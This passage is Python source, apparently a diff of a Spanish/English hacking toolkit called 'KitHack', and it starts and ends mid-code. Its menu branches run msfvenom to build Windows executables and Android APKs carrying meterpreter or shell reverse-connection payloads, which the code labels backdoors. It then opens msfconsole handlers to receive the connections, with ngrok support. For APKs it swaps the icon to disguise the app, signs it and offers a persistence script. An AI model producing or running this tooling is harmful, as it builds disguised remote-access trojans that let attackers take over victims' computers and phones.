{0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '03': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '04': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '05': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/x64/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '06': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '07': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '08': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '09': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '10': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '11': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '12': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/metsvc_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '13': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '14': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/shell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif sys == '03': + print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) + print( + '{0}[01]{1} android/meterpreter_reverse_http'.format(WHITE, YELLOW)) + print( + '{0}[02]{1} android/meterpreter_reverse_https'.format(WHITE, YELLOW)) + print( + '{0}[03]{1} android/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[04]{1} android/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[05]{1} android/shell/reverse_http'.format(WHITE, YELLOW)) + print('{0}[06]{1} android/shell/reverse_https'.format(WHITE, YELLOW)) + print('{0}[07]{1} android/shell/reverse_tcp'.format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == '01': + print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) + print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + '\n') + file.write(mainout) + file.close() + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) + print( + "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/payload -o output/kithack.apk') + location = os.getcwd() + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + # Salida de bucle + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 